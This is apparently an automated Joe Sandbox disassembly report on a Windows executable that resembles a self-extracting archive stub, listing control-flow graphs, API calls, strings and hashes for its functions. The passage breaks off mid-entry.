                                              • Opcode ID: 78fd1134e56c1a7cc3a15fbba7202aa54d6f24ef97007c228dd668e1ff5f73d2
                                              • Instruction ID: 12bc32fa261fc2f4c5f8f4c8fdb06bbc573c6b163bba8aae3fd6ca2993e467ad
                                              • Opcode Fuzzy Hash: 78fd1134e56c1a7cc3a15fbba7202aa54d6f24ef97007c228dd668e1ff5f73d2
                                              • Instruction Fuzzy Hash: 6D421270A40318AEFB25BB689C4AFBE3BA8FB06710F044055F645E65D2D7B59D84CB23

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 257 87f353-87f375 call 88cec0 GetModuleHandleW 260 87f377-87f38e GetProcAddress 257->260 261 87f3c8-87f62f 257->261 264 87f3a0-87f3aa GetProcAddress 260->264 265 87f390-87f39d 260->265 262 87f635-87f640 call 89462a 261->262 263 87f6fd-87f72e GetModuleFileNameW call 87b88c call 87f10e 261->263 262->263 273 87f646-87f673 GetModuleFileNameW CreateFileW 262->273 277 87f730-87f73a call 87a8e0 263->277 264->261 268 87f3ac-87f3c3 264->268 265->264 268->261 275 87f675-87f683 SetFilePointer 273->275 276 87f6f1-87f6f8 CloseHandle 273->276 275->276 278 87f685-87f6a2 ReadFile 275->278 276->263 283 87f747 277->283 284 87f73c-87f740 call 87f309 277->284 278->276 280 87f6a4-87f6c9 278->280 282 87f6e6-87f6ef call 87ef07 280->282 282->276 292 87f6cb-87f6e5 call 87f309 282->292 287 87f749-87f74b 283->287 289 87f745 284->289 290 87f76d-87f78f call 87b902 GetFileAttributesW 287->290 291 87f74d-87f76b CompareStringW 287->291 289->287 294 87f791-87f795 290->294 299 87f799 290->299 291->290 291->294 292->282 294->277 297 87f797 294->297 300 87f79d-87f7a2 297->300 299->300 301 87f7d6-87f7d8 300->301 302 87f7a4 300->302 304 87f8e5-87f8ef 301->304 305 87f7de-87f7f5 call 87b8d6 call 87a8e0 301->305 303 87f7a6-87f7c8 call 87b902 GetFileAttributesW 302->303 311 87f7d2 303->311 312 87f7ca-87f7ce 303->312 315 87f7f7-87f858 call 87f309 * 2 call 87d142 call 873f5b call 87d142 call 888ccb 305->315 316 87f85d-87f890 call 873f5b AllocConsole 305->316 311->301 312->303 314 87f7d0 312->314 314->301 322 87f8dd-87f8df ExitProcess 315->322 321 87f892-87f8d7 GetCurrentProcessId AttachConsole call 8920b3 GetStdHandle WriteConsoleW Sleep FreeConsole 316->321 316->322 321->322
                                              APIs
                                              • GetModuleHandleW.KERNEL32 ref: 0087F36B
                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0087F383
                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087F3A6
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0087F651
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0087F669
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0087F67B
                                              • ReadFile.KERNEL32(00000000,?,00007FFE,008A0858,00000000), ref: 0087F69A
                                              • CloseHandle.KERNEL32(00000000), ref: 0087F6F2
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0087F708
                                              • CompareStringW.KERNEL32(00000400,00001001,008A08A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0087F762
                                              • GetFileAttributesW.KERNELBASE(?,?,008A0870,00000800,?,00000000,?,00000800), ref: 0087F78B
                                              • GetFileAttributesW.KERNEL32(?,?,008A0930,00000800), ref: 0087F7C4
                                                • Part of subcall function 0087F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
                                                • Part of subcall function 0087F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346
                                              • _swprintf.LIBCMT ref: 0087F834
                                              • _swprintf.LIBCMT ref: 0087F880
                                                • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                              • AllocConsole.KERNEL32 ref: 0087F888
                                              • GetCurrentProcessId.KERNEL32 ref: 0087F892
                                              • AttachConsole.KERNEL32(00000000), ref: 0087F899
                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0087F8BF
                                              • WriteConsoleW.KERNEL32(00000000), ref: 0087F8C6
                                              • Sleep.KERNEL32(00002710), ref: 0087F8D1
                                              • FreeConsole.KERNEL32 ref: 0087F8D7
                                              • ExitProcess.KERNEL32 ref: 0087F8DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                              • API String ID: 1201351596-3298887752
                                              • Opcode ID: 607563b7495a00e563d0cd868cf78d09be7ab2f4c2d0b9bed12827bb84391124
                                              • Instruction ID: 88612150b27f879f5077ca38e8366d0ff3096533b4d670c0980ef8dc4d07633d
                                              • Opcode Fuzzy Hash: 607563b7495a00e563d0cd868cf78d09be7ab2f4c2d0b9bed12827bb84391124
                                              • Instruction Fuzzy Hash: 66D16FB10083849AE720DFA18849B9FBAE8FB86344F50492DE398D6A51D7B4D50DCF67

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 404 87ced7-87cf51 call 87c88e GetWindowRect GetClientRect 407 87cf57-87cf5f 404->407 408 87cff2-87cffa 404->408 409 87cf65-87cfae 407->409 410 87d034-87d04f GetSystemMetrics GetWindow 407->410 408->410 411 87cffc-87d02e GetWindowTextW call 87c91f SetWindowTextW 408->411 413 87cfb2-87cfb4 409->413 414 87cfb0 409->414 412 87d12d-87d12f 410->412 411->410 418 87d135-87d13f 412->418 419 87d054-87d05a 412->419 416 87cfb6 413->416 417 87cfb8-87cfee GetWindowLongW GetWindowRect 413->417 414->413 416->417 417->408 419->418 421 87d060-87d078 GetWindowTextW 419->421 422 87d09f-87d0a4 421->422 423 87d07a-87d099 call 87c91f SetWindowTextW 421->423 426 87d0a6-87d114 GetWindowRect 422->426 427 87d11b-87d12a GetWindow 422->427 423->422 426->427 427->418 429 87d12c 427->429 429->412
                                              APIs
                                                • Part of subcall function 0087C88E: _wcschr.LIBVCRUNTIME ref: 0087C8BD
                                              • GetWindowRect.USER32(?,?), ref: 0087CF0E
                                              • GetClientRect.USER32(?,?), ref: 0087CF1A
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0087CFBB
                                              • GetWindowRect.USER32(?,?), ref: 0087CFE8
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0087D007
                                              • SetWindowTextW.USER32(?,?), ref: 0087D02E
                                              • GetSystemMetrics.USER32(00000008), ref: 0087D036
                                              • GetWindow.USER32(?,00000005), ref: 0087D041
                                              • GetWindowTextW.USER32(00000000,?,00000400), ref: 0087D06C
                                              • SetWindowTextW.USER32(00000000,00000000), ref: 0087D099
                                              • GetWindowRect.USER32(00000000,?), ref: 0087D0AC
                                              • GetWindow.USER32(00000000,00000002), ref: 0087D11E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                              • String ID: d
                                              • API String ID: 4134264131-2564639436
                                              • Opcode ID: 16cb1f373a69b9753f4be03abdf09fb95e24d93f5cd75dd4560494030f915430
                                              • Instruction ID: 0bf6fbbe59dfb36d777174f9643e8b3738fea0a53cef8fdf0e5b61e9c3f5e7e8
                                              • Opcode Fuzzy Hash: 16cb1f373a69b9753f4be03abdf09fb95e24d93f5cd75dd4560494030f915430
                                              • Instruction Fuzzy Hash: 6A616E72208300AFD315DF69CD88E6BBBEAFB89714F44451DF684D2690D774E909CB62

                                              Control-flow Graph

                                              APIs
                                              • GetDlgItem.USER32(00000068,008C8958), ref: 0088B71D
                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00889325), ref: 0088B748
                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088B757
                                              • SendMessageW.USER32(00000000,000000C2,00000000,008A02E4), ref: 0088B761
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088B777
                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0088B78D
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088B7CD
                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0088B7D7
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088B7E6
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088B809
                                              • SendMessageW.USER32(00000000,000000C2,00000000,008A1368), ref: 0088B814
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: MessageSend$ItemShowWindow
                                              • String ID: \
                                              • API String ID: 1207805008-2967466578
                                              • Opcode ID: beddab3abb73c7fc25cc9441997ada7e25bc1cc47545a1c5ee1c99fba6c2596b
                                              • Instruction ID: 3f858d3e6af98fa1d3bcc64d9830da70199bdebd6154fe8e51cb03d7e8a3deaf
                                              • Opcode Fuzzy Hash: beddab3abb73c7fc25cc9441997ada7e25bc1cc47545a1c5ee1c99fba6c2596b
                                              • Instruction Fuzzy Hash: 9721D0712857447BE311BB249C45FAB7B9CFF82754F000618FAA0E61D0D7A55A098BA7

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 463 88b9aa-88b9c2 call 88cec0 466 88b9c8-88b9d4 call 8920b3 463->466 467 88bc0e-88bc16 463->467 466->467 470 88b9da-88ba02 call 88dea0 466->470 473 88ba0c-88ba19 470->473 474 88ba04 470->474 475 88ba1b 473->475 476 88ba1d-88ba26 473->476 474->473 475->476 477 88ba28-88ba2a 476->477 478 88ba5e 476->478 479 88ba32-88ba35 477->479 480 88ba62-88ba64 478->480 481 88ba3b-88ba43 479->481 482 88bbc2-88bbc7 479->482 483 88ba6b-88ba6d 480->483 484 88ba66-88ba69 480->484 485 88ba49-88ba4f 481->485 486 88bbdb-88bbe3 481->486 487 88bbc9 482->487 488 88bbbc-88bbc0 482->488 489 88ba80-88ba92 call 87b09c 483->489 490 88ba6f-88ba76 483->490 484->483 484->489 485->486 491 88ba55-88ba5c 485->491 493 88bbeb-88bbf3 486->493 494 88bbe5-88bbe7 486->494 492 88bbce-88bbd2 487->492 488->482 488->492 498 88baab-88bab6 call 879dff 489->498 499 88ba94-88baa1 call 880b12 489->499 490->489 495 88ba78 490->495 491->478 491->479 492->486 493->480 494->493 495->489 505 88bab8-88bacf call 87ae20 498->505 506 88bad3-88bae0 ShellExecuteExW 498->506 499->498 504 88baa3 499->504 504->498 505->506 508 88bc0c-88bc0d 506->508 509 88bae6-88baf9 506->509 508->467 511 88bafb-88bb02 509->511 512 88bb0c-88bb0e 509->512 511->512 513 88bb04-88bb0a 511->513 514 88bb10-88bb19 512->514 515 88bb21-88bb40 call 88be69 512->515 513->512 516 88bb77-88bb83 CloseHandle 513->516 514->515 521 88bb1b-88bb1f ShowWindow 514->521 515->516 533 88bb42-88bb4a 515->533 519 88bb94-88bba2 516->519 520 88bb85-88bb92 call 880b12 516->520 522 88bbff-88bc01 519->522 523 88bba4-88bba6 519->523 520->519 531 88bbf8 520->531 521->515 522->508 526 88bc03-88bc05 522->526 523->522 528 88bba8-88bbae 523->528 526->508 530 88bc07-88bc0a ShowWindow 526->530 528->522 532 88bbb0-88bbba 528->532 530->508 531->522 532->522 533->516 534 88bb4c-88bb5d GetExitCodeProcess 533->534 534->516 535 88bb5f-88bb69 534->535 536 88bb6b 535->536 537 88bb70 535->537 536->537 537->516
                                              APIs
                                              • ShellExecuteExW.SHELL32(000001C0), ref: 0088BAD8
                                              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0088BB1D
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0088BB55
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0088BB7B
                                              • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0088BC0A
                                                • Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                              • String ID: $.exe$.inf
                                              • API String ID: 3686203788-2452507128
                                              • Opcode ID: 30a631c03982e4afa78e2d5bbec2a58ee1079a94b7a83c39badb4a78e5ab5485
                                              • Instruction ID: e033b91001b29f34f644b0022d5865810454a0f736ffcd78ee616e8faed16bf3
                                              • Opcode Fuzzy Hash: 30a631c03982e4afa78e2d5bbec2a58ee1079a94b7a83c39badb4a78e5ab5485
                                              • Instruction Fuzzy Hash: 4D51CD3050A7909AEB31BF64D940ABBBBE9FFC5314F04081DE4C1D32A5EBB19949CB52

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 538 87cacc-87cb00 call 88cdf0 call 88cec0 call 890138 545 87cb33-87cb3c call 87f10e 538->545 546 87cb02-87cb31 GetModuleFileNameW call 87b88c call 87f0e6 538->546 549 87cb41-87cb65 call 879401 call 87973d 545->549 546->549 557 87cb6b-87cb74 549->557 558 87cdb8-87cdd3 call 879437 549->558 560 87cb77-87cb7a 557->560 562 87cb80-87cb86 call 879aeb 560->562 563 87cca8-87ccc8 call 8799e0 call 8920d3 560->563 567 87cb8b-87cbb2 call 87990d 562->567 563->558 574 87ccce-87cce7 call 87990d 563->574 572 87cc71-87cc74 567->572 573 87cbb8-87cbc0 567->573 578 87cc77-87cc99 call 8799e0 572->578 576 87cbc2-87cbca 573->576 577 87cbeb-87cbf6 573->577 584 87ccf0-87cd02 call 8920d3 574->584 585 87cce9-87ccee 574->585 576->577 580 87cbcc-87cbe6 call 893660 576->580 581 87cc21-87cc29 577->581 582 87cbf8-87cc04 577->582 578->560 596 87cc9f-87cca2 578->596 599 87cc67-87cc6f 580->599 600 87cbe8 580->600 589 87cc55-87cc59 581->589 590 87cc2b-87cc33 581->590 582->581 587 87cc06-87cc0b 582->587 584->558 606 87cd08-87cd25 call 8806e9 call 8920ce 584->606 592 87cd27-87cd2f 585->592 587->581 595 87cc0d-87cc1f call 893589 587->595 589->572 591 87cc5b-87cc5e 589->591 590->589 597 87cc35-87cc4f call 893660 590->597 591->573 602 87cd34-87cd41 592->602 603 87cd31 592->603 595->581 611 87cc63 595->611 596->558 596->563 597->558 597->589 599->578 600->577 608 87cd43-87cd45 602->608 609 87cdad-87cdb5 602->609 603->602 606->592 612 87cd46-87cd50 608->612 609->558 611->599 612->609 613 87cd52-87cd56 612->613 615 87cd90-87cd93 613->615 616 87cd58-87cd5f 613->616 621 87cd95-87cd9b 615->621 622 87cd9d-87cd9f 615->622 618 87cd86 616->618 619 87cd61-87cd64 616->619 625 87cd88-87cd8e 618->625 623 87cd66-87cd69 619->623 624 87cd82-87cd84 619->624 621->622 626 87cda0 621->626 622->626 628 87cd7e-87cd80 623->628 629 87cd6b-87cd6e 623->629 624->625 627 87cda4-87cdab 625->627 626->627 627->609 627->612 628->625 630 87cd70-87cd74 629->630 631 87cd7a-87cd7c 629->631 630->626 632 87cd76-87cd78 630->632 631->625 632->625
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0087CAD1
                                              • _wcschr.LIBVCRUNTIME ref: 0087CAEF
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0087CAB3,?), ref: 0087CB0A
                                                • Part of subcall function 008806E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087B25B,00000000,?,?,?,?), ref: 00880705
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                              • String ID: *messages***$*messages***$R$a
                                              • API String ID: 803915177-2900423073
                                              • Opcode ID: 2bb255bb5727d66ddf919c86bf6ee2ade0e38fdc7c62de203c04d8270622a56e
                                              • Instruction ID: 8bfe9a4a7a2fd1a22093de5237e4aee947e38a9bf54680d575403a979109bc21
                                              • Opcode Fuzzy Hash: 2bb255bb5727d66ddf919c86bf6ee2ade0e38fdc7c62de203c04d8270622a56e
                                              • Instruction Fuzzy Hash: 459123B1A002089ADB30EF68CC85BAEBBA4FF54314F14C56EE65DE7295DB70D984CB50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 633 8973ae-8973c7 634 8973c9-8973d9 call 89b9bc 633->634 635 8973dd-8973e2 633->635 634->635 643 8973db 634->643 637 8973ef-897413 MultiByteToWideChar 635->637 638 8973e4-8973ec 635->638 640 897419-897425 637->640 641 8975a6-8975b9 call 88d783 637->641 638->637 644 897479 640->644 645 897427-897438 640->645 643->635 649 89747b-89747d 644->649 646 89743a-897449 call 89f160 645->646 647 897457-897468 call 8959fc 645->647 652 89759b 646->652 658 89744f-897455 646->658 647->652 659 89746e 647->659 649->652 653 897483-897496 MultiByteToWideChar 649->653 657 89759d-8975a4 call 897616 652->657 653->652 656 89749c-8974ae call 897a09 653->656 663 8974b3-8974b7 656->663 657->641 662 897474-897477 658->662 659->662 662->649 663->652 665 8974bd-8974c4 663->665 666 8974fe-89750a 665->666 667 8974c6-8974cb 665->667 669 89750c-89751d 666->669 670 897556 666->670 667->657 668 8974d1-8974d3 667->668 668->652 671 8974d9-8974f3 call 897a09 668->671 673 897538-897549 call 8959fc 669->673 674 89751f-89752e call 89f160 669->674 672 897558-89755a 670->672 671->657 685 8974f9 671->685 676 89755c-897575 call 897a09 672->676 677 897594-89759a call 897616 672->677 673->677 689 89754b 673->689 674->677 688 897530-897536 674->688 676->677 691 897577-89757e 676->691 677->652 685->652 690 897551-897554 688->690 689->690 690->672 692 8975ba-8975c0 691->692 693 897580-897581 691->693 694 897582-897592 WideCharToMultiByte 692->694 693->694 694->677 695 8975c2-8975c9 call 897616 694->695 695->657
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00892FC2,00892FC2,?,?,?,008975FF,00000001,00000001,F5E85006), ref: 00897408
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008975FF,00000001,00000001,F5E85006,?,?,?), ref: 0089748E
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00897588
                                              • __freea.LIBCMT ref: 00897595
                                                • Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                              • __freea.LIBCMT ref: 0089759E
                                              • __freea.LIBCMT ref: 008975C3
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              • Opcode ID: a8f347ffe2eb0b28df9c39eea8437db9cf6c2a256a851df023611b7a2f81e261
                                              • Instruction ID: 3dce29735da8719ca41b1f96b6ca1fe313daa27580e9b1f0458f6f0c725d4712
                                              • Opcode Fuzzy Hash: a8f347ffe2eb0b28df9c39eea8437db9cf6c2a256a851df023611b7a2f81e261
                                              • Instruction Fuzzy Hash: BE51C172624216AFEF25AF68CC41EBF7BA9FB44750F5A4629FC05D6150EB34DC40C6A0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 698 87deb5-87debc 699 87def1-87def2 698->699 700 87debe-87decc call 87f309 698->700 703 87dece-87deea GetProcAddress * 2 700->703 704 87deed 700->704 703->704 704->699
                                              APIs
                                                • Part of subcall function 0087F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
                                                • Part of subcall function 0087F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346
                                              • GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 0087DED4
                                              • GetProcAddress.KERNEL32(008B1E58,CryptUnprotectMemory), ref: 0087DEE4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                              • API String ID: 2141747552-1753850145
                                              • Opcode ID: d46a18e0ac5ac1e254d93ac1f3c1addfe9f21ff41be0504fe68be29facfb4ce3
                                              • Instruction ID: 5324410bb78fc489f1d9f9c93540171f0d2287a20a5f2ab26b2ecf9583112108
                                              • Opcode Fuzzy Hash: d46a18e0ac5ac1e254d93ac1f3c1addfe9f21ff41be0504fe68be29facfb4ce3
                                              • Instruction Fuzzy Hash: 53E04FB1500B43AEEB415B759808B06FBA4FF62714F14C515F068C3B55EBB8D0A89F50

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0087FDC9: ResetEvent.KERNEL32(?,?,0087F9F3,00F6E8B8,?,008B1E74,00000000,0089F79B,000000FF,000001B8,0087FC8F,?,?,?,?,0087A5A0), ref: 0087FDE9
                                                • Part of subcall function 0087FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0087A5A0,?,?,?,?,0089F79B,000000FF), ref: 0087FDFD
                                              • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0087FA05
                                              • CloseHandle.KERNEL32(?,?), ref: 0087FA1F
                                              • DeleteCriticalSection.KERNEL32(?), ref: 0087FA38
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 0087FA44
                                              • CloseHandle.KERNEL32(?), ref: 0087FA50
                                                • Part of subcall function 0087FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0087FD0B,?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FACD
                                                • Part of subcall function 0087FAC7: GetLastError.KERNEL32(?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FAD9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Close$HandleReleaseSemaphore$ChangeCriticalDeleteErrorEventFindLastNotificationObjectResetSectionSingleWait
                                              • String ID:
                                              • API String ID: 565839277-0
                                              • Opcode ID: d7414be931f82e75cbfc96d59e43c34d741b2c896a424a4d06c47f5f09e19524
                                              • Instruction ID: c9700941519f4cbf942108894d17023c5d4f538f2d59c516cfa4fa76cb2094fa
                                              • Opcode Fuzzy Hash: d7414be931f82e75cbfc96d59e43c34d741b2c896a424a4d06c47f5f09e19524
                                              • Instruction Fuzzy Hash: 92019E32000B44EFDB319B69DD84F86BBAAFB46711F008529F2AED2965CB716800CB21

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 741 888fc8-888fe7 GetClassNameW 742 888fe9-888ffe call 880b12 741->742 743 88900f-889011 741->743 748 88900e 742->748 749 889000-88900c FindWindowExW 742->749 744 88901c-889020 743->744 745 889013-889016 SHAutoComplete 743->745 745->744 748->743 749->748
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000050), ref: 00888FDF
